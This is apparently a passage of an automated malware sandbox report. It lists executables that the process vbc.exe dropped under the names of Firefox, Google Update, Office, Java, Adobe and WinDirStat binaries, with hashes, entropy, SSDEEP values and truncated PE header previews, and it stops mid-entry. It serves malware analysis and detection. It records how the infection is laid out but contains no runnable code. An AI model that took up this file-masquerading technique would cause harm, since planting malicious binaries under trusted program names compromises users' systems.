Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1383768
Entropy (8bit):	7.890253252370955
Encrypted:	false
SSDEEP:	24576:xBomhivuOx5SUXJW/D4xUa38vKdTIkpgSWC+osF0jzZVb+t35cMYlG96NMBJMncK:xBom8Bx5SUW/cxUitIGLsF0nb+tJVYlj
MD5:	8CA19D9F561569917EE382B55C4C7853
SHA1:	F1C0DC0CF107FF598E1E65B88754BC52057059A4
SHA-256:	7276D1DB9E4661810D6A80DE1813CC735E34D6BA6E1BA6FFBD3B87B8F608CDBA
SHA-512:	C0E180A68D1A4165225E6AD861594ABCAA761AA2AF93B5236DFB13A5772C59A7C1E8F734661FDB4C4E73F08F5875E87132ECDA435E6227193D7C953A658342D1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	112512
Entropy (8bit):	6.059148015230384
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4ydogcgVZlhOP4l9ovN7hYFjZUAFxO9:xBRBcmh7bC5dJcehOPQcibUoG
MD5:	0C96933C69FCB58BB7EFDC9CD70CD25E
SHA1:	BCC382CDFD5474BE424A5210A8AF588CC201FF10
SHA-256:	3C1F5AEA5BC4E6C5FE53393AB86ACB26A1283E34C7E1B9E9470599B944B7CFE7
SHA-512:	F7C678EA20D86E0A456E6ECBDA42B076689751FA2F0B141775DAECA5B9468D23435B45AE8813F690839EB9097F367297C39006C858B3FEDA18D2C322C14A3760
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	161224
Entropy (8bit):	6.33303545454112
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4fCUOR/aVx+F0ZhuW+j4bdnBrN5wRBrt4oss:xBRBcmh7bC+CUORqx+cu6nBrN5U5t4ot
MD5:	9ED6BCF77B063BCC34E8366D3B852E47
SHA1:	BAE324699FEB1F47D03FAF59720647AE9A5540B4
SHA-256:	E377025968D66DDE5DCE53F64430FC5A551E736A3334DCDA357895F5E4A6F283
SHA-512:	68D641125478A57BFF9474E7F887C426EE063CF9AB618C052E1A362467F7182DA9A06FCDCF198B83D53C905B5CD2EC9A3F49E6973557916C760E42202967437D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Firefox\firefox.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	558536
Entropy (8bit):	6.698423065579275
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCdi5vvtUynMstDCSflR/SHdCzx5xoX3/Di6R/SHdCzxYKdR3Gxqt:xBzcmhi4vvtTrH4+03/DipXKdR2xW
MD5:	A95809E0D8873A06E1284910FD55AB2B
SHA1:	0144929BCEF0425AA111B33D4D7CAD03576DDD33
SHA-256:	366BA12EFF702279672F3F732300C1A17DE532A41A7CD505401748DD5AE90A9B
SHA-512:	8C5083D67B4D540461F11D476DBCC7EC2F4C4D11CE1D2CE63B2E378D4D7760B8E9178FE1DAD91C88DB2C6EEA4A32ECFA4E39ED5D30B775B467227A57A91FCD43
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	213960
Entropy (8bit):	6.485078651854518
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bC6wsefACpJ28FtN6mr/NZfW+zw:xBzcmhi6wsOg4DrVZfW+zw
MD5:	2C5A6CE2A7C39BF2BB5EC475DE883F69
SHA1:	932081C4E027EBB8CBD9DD47CDFDA50334DBF347
SHA-256:	752885E7B0E2DB24E1EC15922536079C7AD0BDCB006621BC0CE7531839031180
SHA-512:	C415FCF3A96558C0589C92B49CA22FBFE0F1071FAABFEC167A4F77FA04DC9F2F235AC7A07EB2E32FBE76CC793DEEFE8AAA02EEEBDF908A11CE6643B3DD5A79A6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197448
Entropy (8bit):	5.670577511356804
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bC3D50qP7qUXDI17y4gP7UGC7W7BUEU0:xBzcmhi3D50qP7qUXDIYP7+a7FU0
MD5:	22DC883B605C419AFD1B2116FE2F1678
SHA1:	807C5B8C6C745C9A0A9DABE73033FE128E724DD9
SHA-256:	8D002981AB96FD0590E7D7C97C8771AEF51D66CB43E12DFA4F5F63150B986959
SHA-512:	2E30D0CA21E938323EFEC34F596BA8F57C50918368EAA6B4C625E13BC1AF240359F0A0813A57C0720BB0087E304F99B99AC1C0EDD7CA15714956FBD678F78BBE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	569288
Entropy (8bit):	5.073919102910978
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCGvNAXJyqpNjl0CNDB7rUIuC1/44an4hsSU+Grjr:xBzcmhiGaJyqjjl0wOzO/4NVL
MD5:	52DB008559B37573244CF617A3765FE8
SHA1:	0EF8402B69CF86FFCAAEDFE27815239CBE956C29
SHA-256:	F01F6A97F89109A72F03964027FB5E703A170DDD6F5E9336C2FF545387BB2F82
SHA-512:	C47D165C18E4CC43BD55E5CF0EF2B4874312CAF0FDB16A83C9208ED70BF6A9C2642A9863956552A89371CB55B7DCF2334F6D6AFFA85FF80CB9C6BE5946094756
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197064
Entropy (8bit):	4.849071293976191
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I48YiIXfdvzY9omOYY3lxaGDmByN/mPjGdP0:xBRBcmh7bC/YiIXfdeetlxaQmB4O
MD5:	8B6D6BBF99F9ED1B86BD59396EB64730
SHA1:	C0CB0DAEBEB202AF8FB968FB944B250B1FF371F0
SHA-256:	D7B800F61DDA6FFE4B005A5FA3E6F960B22EC6632B9976C023521C669C28C1C0
SHA-512:	D5392EBF2ED3AC84F4CFDFDBD3713003C3DAFC192B5D9B0F8C1312F20F20041379719F7AA19BC6CB1FCA2B2ECCD379352B9BFADE29279539048194EF6F676823
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	913856
Entropy (8bit):	5.49577627343015
Encrypted:	false
SSDEEP:	24576:xBomhiMOW2+Uf7k3KvkTgXuquveY+W2o8oT3ezMrl9cekcHhXh9HJUiWUXsmqsqV:xBom8Pj+UfI3KvkTgXuquveY+W2o8oT2
MD5:	BCB5E6D90DE6EC0F941479BAF5C91FB6
SHA1:	0E4C71DDEDE20F85945AEDF47EEF2017380626F4
SHA-256:	4D4EB66C3678B40CD45A67F77FC5DBFCCF9C377BBFD9A1AFF1DB4EDBD2978539
SHA-512:	09C5AA7C05B6A3CF9AA93344E66299E725C519CD0344466C75C5EC49BA6092B124573225A8022D48077AD8FC786EC0329577ACBE3DB836B1C5E4D4CDC4BCA0EF
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Firefox\updater.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	362952
Entropy (8bit):	6.240445810697794
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCD1I7bItvUefWI6lzG8WtWaZZQaKh3PfcKrKywXKG2h03otuMN:xBzcmhiWbItvUefWIOSzhKpdGy4T+03I
MD5:	5DD074DB5191DBD80A4134DA2D80A76A
SHA1:	5CB42613F264DA24D3C056100E664613E40342DB
SHA-256:	C89AEB5F3EB7BCA61F825FFEF6283B6C411D718E5AD1E4EB35558FB9AD99C80C
SHA-512:	874828B92FE89A5025E399763CC9CF4905BCEC1DD75CA19ED275E4372B353652C9593E910BF7125AEAB1155B2518A176DC971027D3955225A0CDF3057ACF6DD1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	141256
Entropy (8bit):	5.844819004595209
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I462DwcU4Xg+VvLyBFKkAQiXFFOUNB:xBRBcmh7bCpDde9rF1FOUz
MD5:	E9827674B1C7A6D93BD1660DF50F4342
SHA1:	0BA083882A58BEF37276E7F4689AA642E9B66D3C
SHA-256:	F3AA08B85BA04CCC3B934CFBD594BC039E1D58F1FE7E0566AFF355FF9422F50D
SHA-512:	7E0D5E6888DD2280F263616B73FF7F8A4017BAAE7EC72D475129B384E62FD3B915798CD47438C82025C0704505B329D6FB8F3B7DDE297ECA7A2A6D262C450A97
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	130142
Entropy (8bit):	5.825057887936006
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4iRD5bMln7y4gP7oIWGC7W7BuDcYzItU0:xBRBcmh7bC3D50n7y4gP7GGC7W7BUEU0
MD5:	3FA346BB0FB12530782E36EB27EBA966
SHA1:	F19DCFED194CA397E6397A57AF5FB179D814B279
SHA-256:	BFE7479DFBD6067BF6CD24EB93FB5F056C2615E850CDA3202329AB01087CF0B6
SHA-512:	85AA7FF2A74D3ACE3CC887C3C79968CA04C303BB51E16D9EBE886A4DD0F493D68EB0CD7F117B8B147170F7A5377B54549B375E04ADEE19B947475FD1B2B10371
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	213960
Entropy (8bit):	6.485078651854518
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bC6wsefACpJ28FtN6mr/NZfW+zw:xBzcmhi6wsOg4DrVZfW+zw
MD5:	2C5A6CE2A7C39BF2BB5EC475DE883F69
SHA1:	932081C4E027EBB8CBD9DD47CDFDA50334DBF347
SHA-256:	752885E7B0E2DB24E1EC15922536079C7AD0BDCB006621BC0CE7531839031180
SHA-512:	C415FCF3A96558C0589C92B49CA22FBFE0F1071FAABFEC167A4F77FA04DC9F2F235AC7A07EB2E32FBE76CC793DEEFE8AAA02EEEBDF908A11CE6643B3DD5A79A6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\WinDirStat\Uninstall.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89318
Entropy (8bit):	6.11478960548657
Encrypted:	false
SSDEEP:	1536:xBR2ucOhDh7uIhzVCbd56fCxU6QeSnQma4yMleHFSfARDSW0HefHbmJZUlNu08:xBRBcmh7b1I4+lTSr+vbmJCNu7
MD5:	0ED96AFA0B94E7C77C8B92A7051A7DB0
SHA1:	6F75A14FCE8D50C3E4B057251D11BA5EAA184AB2
SHA-256:	7F4C31BB8E322B09695C673998F1FD600BE1FD553C57DCAB26CC070AE5A7478A
SHA-512:	8FE937C42DA5117D82BB8E360389978D730F3F8349404E0B189FB3C0109D5D49AFAFA27DBFD6BEAA68D4AB2EC08168820A73F692F05F08BCEBE55E422F0765CC
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\WinDirStat\windirstat.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	692736
Entropy (8bit):	6.305955910462259
Encrypted:	false
SSDEEP:	12288:xBzcmhiifJO6egoEQFauJsfmhR5ju0phsQkPaUynbiljjQt6pgw/HuADmF5Unhjl:xBomhidjJVhRZdpmQkYyjjQtSgKOUnxl
MD5:	97010D840FC171D57140FCBA0CC88909
SHA1:	23EB6805DD7238141978514CA58CD4B7181FC74A
SHA-256:	0EBF40F9D39B5D9911C2F2295C0E3F65689BC8BCC2CC0621582CC2936F62C623
SHA-512:	5DEE1181E40E5F10993FF130CB1B23EFBC50115CFA8244A50A67EDFCCD8BDF162A4CF8FA17F01CBFA094E8B7B7E5C38AAEFD3A04DAB3FD545D01F02A61E75249
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	502864
Entropy (8bit):	6.066073488136399
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCioW2iQ1shd/F9RLbNQouu14MdVTL6yB3uIAFyOSITU:xBzcmhiXKPNv3Nuu14OTL6AxOrTU
MD5:	0B68FFD9CE3882151B79ABE3B9A898CE
SHA1:	3771A55AAA81A294411CD844E37F6B19DCE970B4
SHA-256:	CE8724FC1D65B4567C8657AD701B81AC98BD37C0F511E2AAF89778311747669A
SHA-512:	78C9090DF0EFCB3331A6CCA21517765B97F08BBAC1E7CA0F8524AF687E1F978ACD8D0B1FB16C1CA356BC0421171582C57D80EFB2B6C9FF26E59B9E01A5871963
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	248384
Entropy (8bit):	6.558685437483299
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCxjHvOdT7duCKbi6ozfwTBxR5vtI9gSTml:xBzcmhixj2pwTLR5vtI9gSTM
MD5:	3E61CCAEFDC165B09A62CF741D03F3C5
SHA1:	98CCC4939C57CDEE2495711A0BED0A66F76CA608
SHA-256:	71CFE78F8606D3B99C4D2048E3F6DA25DFA76E50B8FDE210A25AFDA48390A0C1
SHA-512:	253E46434CE03F09E86873D6B6B1B70993F2A6F4451DCD0724FC63AE8975F6ACAFE4D4169EE6B5864879CB3694350ED87E65AB60AC33BFB98961292DD12BB4C4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	248384
Entropy (8bit):	6.56119542272563
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCxt8tRluTLdmGIebIsciZjTBwzKvkNTWHjQi:xBzcmhixtYwHjTuzKvkVWHjt
MD5:	3EC42A5E0FF7804680E200A5F42560C5
SHA1:	3D137B4E3B40ADE0FBF837F4EBE02932E68FD05F
SHA-256:	6DA6A224A468BA76BB86FB3DF9D4565CBD6BDF4AE65B5AC1EC3C4953BA2D624C
SHA-512:	4FA270782D5AFF93B3EA4B196F1F34892548FA7060F460D60C3D2DC1D2B8C22B4CB8A5174EF92040BEA1AE5C8036673BD9799292046F986E44BEDCC449ACBEF9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	360000
Entropy (8bit):	6.297336444521721
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCxOEMw7O+WW5T2B/1ghTBRm35i9jUOHXhv0TfcbWjdVm:xBzcmhixOEMw715Q1gvhvUcbWjdVm
MD5:	2C4E5E311B1C190C49A04E28D4925F73
SHA1:	8E8DE2627B03AF92AFF8C46811BAA336CA9766C0
SHA-256:	16EBF8798D69AD0578266CEE37FA51D48B2C775F115B508F87A3301399D8E667
SHA-512:	A91E93A217B17EFAE84DEFB2DDB16A448A6637C5165AF578BA5CCFD709091A86B0E9B3688A72D23999AA437BF6F1678C82D176175381E2EA1840478C0768FB63
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe Download File
Process:	C:\Users\Public\vbc.exe
